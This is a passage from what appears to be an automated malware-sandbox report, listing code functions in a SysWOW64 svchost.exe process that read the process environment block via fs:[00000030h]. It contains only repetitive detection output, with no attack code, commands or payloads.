Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6E284 mov eax, dword ptr fs:[00000030h]	7_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6E284 mov eax, dword ptr fs:[00000030h]	7_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h]	7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h]	7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB0283 mov eax, dword ptr fs:[00000030h]	7_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C05283 mov eax, dword ptr fs:[00000030h]	7_2_03C05283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF2F8 mov eax, dword ptr fs:[00000030h]	7_2_03BEF2F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B292FF mov eax, dword ptr fs:[00000030h]	7_2_03B292FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h]	7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h]	7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h]	7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h]	7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h]	7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	7_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5F2D0 mov eax, dword ptr fs:[00000030h]	7_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B392C5 mov eax, dword ptr fs:[00000030h]	7_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B392C5 mov eax, dword ptr fs:[00000030h]	7_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2823B mov eax, dword ptr fs:[00000030h]	7_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B67208 mov eax, dword ptr fs:[00000030h]	7_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B67208 mov eax, dword ptr fs:[00000030h]	7_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B59274 mov eax, dword ptr fs:[00000030h]	7_2_03B59274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B71270 mov eax, dword ptr fs:[00000030h]	7_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B71270 mov eax, dword ptr fs:[00000030h]	7_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h]	7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h]	7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h]	7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h]	7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFD26B mov eax, dword ptr fs:[00000030h]	7_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFD26B mov eax, dword ptr fs:[00000030h]	7_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2826B mov eax, dword ptr fs:[00000030h]	7_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A250 mov eax, dword ptr fs:[00000030h]	7_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C05227 mov eax, dword ptr fs:[00000030h]	7_2_03C05227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEB256 mov eax, dword ptr fs:[00000030h]	7_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEB256 mov eax, dword ptr fs:[00000030h]	7_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B36259 mov eax, dword ptr fs:[00000030h]	7_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29240 mov eax, dword ptr fs:[00000030h]	7_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29240 mov eax, dword ptr fs:[00000030h]	7_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6724D mov eax, dword ptr fs:[00000030h]	7_2_03B6724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4B1B0 mov eax, dword ptr fs:[00000030h]	7_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C051CB mov eax, dword ptr fs:[00000030h]	7_2_03C051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h]	7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h]	7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h]	7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h]	7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h]	7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h]	7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h]	7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C061E5 mov eax, dword ptr fs:[00000030h]	7_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B87190 mov eax, dword ptr fs:[00000030h]	7_2_03B87190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B70185 mov eax, dword ptr fs:[00000030h]	7_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEC188 mov eax, dword ptr fs:[00000030h]	7_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEC188 mov eax, dword ptr fs:[00000030h]	7_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BD71F9 mov esi, dword ptr fs:[00000030h]	7_2_03BD71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B601F8 mov eax, dword ptr fs:[00000030h]	7_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h]	7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B351ED mov eax, dword ptr fs:[00000030h]	7_2_03B351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6D1D0 mov eax, dword ptr fs:[00000030h]	7_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h]	7_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	7_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	7_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	7_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	7_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	7_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	7_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B31131 mov eax, dword ptr fs:[00000030h]	7_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B31131 mov eax, dword ptr fs:[00000030h]	7_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h]	7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h]	7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h]	7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h]	7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C05152 mov eax, dword ptr fs:[00000030h]	7_2_03C05152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B60124 mov eax, dword ptr fs:[00000030h]	7_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h]	7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h]	7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h]	7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF0115 mov eax, dword ptr fs:[00000030h]	7_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h]	7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC9179 mov eax, dword ptr fs:[00000030h]	7_2_03BC9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B37152 mov eax, dword ptr fs:[00000030h]	7_2_03B37152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2C156 mov eax, dword ptr fs:[00000030h]	7_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC8158 mov eax, dword ptr fs:[00000030h]	7_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B36154 mov eax, dword ptr fs:[00000030h]	7_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B36154 mov eax, dword ptr fs:[00000030h]	7_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h]	7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h]	7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h]	7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h]	7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h]	7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h]	7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h]	7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h]	7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	7_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	7_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C050D9 mov eax, dword ptr fs:[00000030h]	7_2_03C050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B35096 mov eax, dword ptr fs:[00000030h]	7_2_03B35096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5D090 mov eax, dword ptr fs:[00000030h]	7_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5D090 mov eax, dword ptr fs:[00000030h]	7_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6909C mov eax, dword ptr fs:[00000030h]	7_2_03B6909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3208A mov eax, dword ptr fs:[00000030h]	7_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D08D mov eax, dword ptr fs:[00000030h]	7_2_03B2D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	7_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	7_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B550E4 mov eax, dword ptr fs:[00000030h]	7_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B550E4 mov ecx, dword ptr fs:[00000030h]	7_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B380E9 mov eax, dword ptr fs:[00000030h]	7_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB20DE mov eax, dword ptr fs:[00000030h]	7_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B590DB mov eax, dword ptr fs:[00000030h]	7_2_03B590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h]	7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]	7_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]	7_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h]	7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h]	7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h]	7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h]	7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2A020 mov eax, dword ptr fs:[00000030h]	7_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2C020 mov eax, dword ptr fs:[00000030h]	7_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C05060 mov eax, dword ptr fs:[00000030h]	7_2_03C05060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h]	7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h]	7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h]	7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h]	7_2_03B4E016
